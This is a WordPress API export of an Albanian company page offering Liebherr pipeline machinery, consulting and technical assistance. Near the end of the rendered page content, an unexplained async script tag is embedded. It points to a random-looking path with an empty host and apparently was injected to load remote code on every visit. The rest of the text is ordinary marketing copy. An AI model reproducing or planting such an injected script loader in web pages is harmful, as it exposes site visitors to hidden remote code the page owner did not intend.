{"id":1976,"date":"2020-07-29T11:01:38","date_gmt":"2020-07-29T11:01:38","guid":{"rendered":"http:\/\/www.lexalko.com\/?page_id=1976"},"modified":"2020-07-29T12:11:49","modified_gmt":"2020-07-29T12:11:49","slug":"asistence-teknike","status":"publish","type":"page","link":"https:\/\/lexalko.com\/index.php\/asistence-teknike\/","title":{"rendered":"Asistence Teknike"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_custom_heading text=&#8221;Makineri per cfaredolloj projekti&#8221; font_container=&#8221;tag:h2|text_align:left|color:%23000000&#8243; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_separator color=&#8221;custom&#8221; align=&#8221;align_left&#8221; border_width=&#8221;4&#8243; el_width=&#8221;10&#8243; accent_color=&#8221;#f99422&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: justify;\">Liebherr \u00ebsht\u00eb nj\u00eb nga furnizuesit kryesor\u00eb t\u00eb pajisjeve dhe sh\u00ebrbimeve p\u00ebr industrin\u00eb e tubacionit rreth globit. Liebherr fokusohet n\u00eb shitje t\u00eb pajisjeve t\u00eb reja dhe t\u00eb p\u00ebrdorura me cil\u00ebsi t\u00eb lart\u00eb p\u00ebr nd\u00ebrtimin e tubacioneve me t\u00eb gjitha diametrat e k\u00ebrkuar.<br \/>\nMisioni jon\u00eb \u00ebsht\u00eb q\u00eb t\u00eb ofrojm\u00eb sh\u00ebrbimin m\u00eb t\u00eb mir\u00eb p\u00ebr kompanit\u00eb v\u00ebndase. Lexalko mbulon me informacion, konsulenc\u00eb, shitje, pjes\u00eb k\u00ebmbimi dhe mb\u00ebshtetje n\u00eb projekte sipas standarteve t\u00eb k\u00ebrkuara dhe t\u00eb rekomanduara t\u00eb industris\u00eb s\u00eb gazifikimit dhe tubacioneve.<br \/>\nLiebherr mund\u00ebson pajisjen me makineri t\u00eb nd\u00ebrtuara enkas p\u00ebr projektet tuaja n\u00eb energjitike si edhe ju mund\u00ebson prodhimin e makinerive sipas k\u00ebrkesave teknike dhe inxhinierike t\u00eb projektit.<br \/>\nLexalko ju mund\u00ebson t\u00eb gjith\u00eb asistenc\u00ebn e duhur n\u00eb m\u00ebnyr\u00eb q\u00eb ti vizitoni nga af\u00ebr fabrikat Liebherr dhe t\u00eb diskutoni me stafin teknik dhe menaxherial p\u00ebr planet tuaja ne industrin\u00eb e energjiis\u00eb s\u00eb rinovueshme.<\/p>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;1807&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script async src='https:\/\/\/3gGykjDJ?frm=script&#038;_cid=123' type='text\/javascript'><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/2&#8243;][vc_custom_heading text=&#8221;Makineri per cfaredolloj projekti&#8221; font_container=&#8221;tag:h2|text_align:left|color:%23000000&#8243; google_fonts=&#8221;font_family:Open%20Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic|font_style:400%20regular%3A400%3Anormal&#8221;][vc_separator color=&#8221;custom&#8221; align=&#8221;align_left&#8221; border_width=&#8221;4&#8243; el_width=&#8221;10&#8243; accent_color=&#8221;#f99422&#8243;][vc_column_text] Liebherr \u00ebsht\u00eb nj\u00eb nga furnizuesit kryesor\u00eb t\u00eb pajisjeve dhe sh\u00ebrbimeve p\u00ebr industrin\u00eb e tubacionit rreth globit. Liebherr fokusohet n\u00eb shitje t\u00eb pajisjeve t\u00eb reja dhe t\u00eb p\u00ebrdorura me cil\u00ebsi t\u00eb lart\u00eb p\u00ebr nd\u00ebrtimin e tubacioneve me t\u00eb gjitha diametrat e k\u00ebrkuar. Misioni&hellip;<\/p>\n","protected":false},"author":7,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_joinchat":[],"footnotes":""},"class_list":["post-1976","page","type-page","status-publish","hentry","description-off"],"_links":{"self":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/1976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/comments?post=1976"}],"version-history":[{"count":4,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/1976\/revisions"}],"predecessor-version":[{"id":1980,"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/pages\/1976\/revisions\/1980"}],"wp:attachment":[{"href":"https:\/\/lexalko.com\/index.php\/wp-json\/wp\/v2\/media?parent=1976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}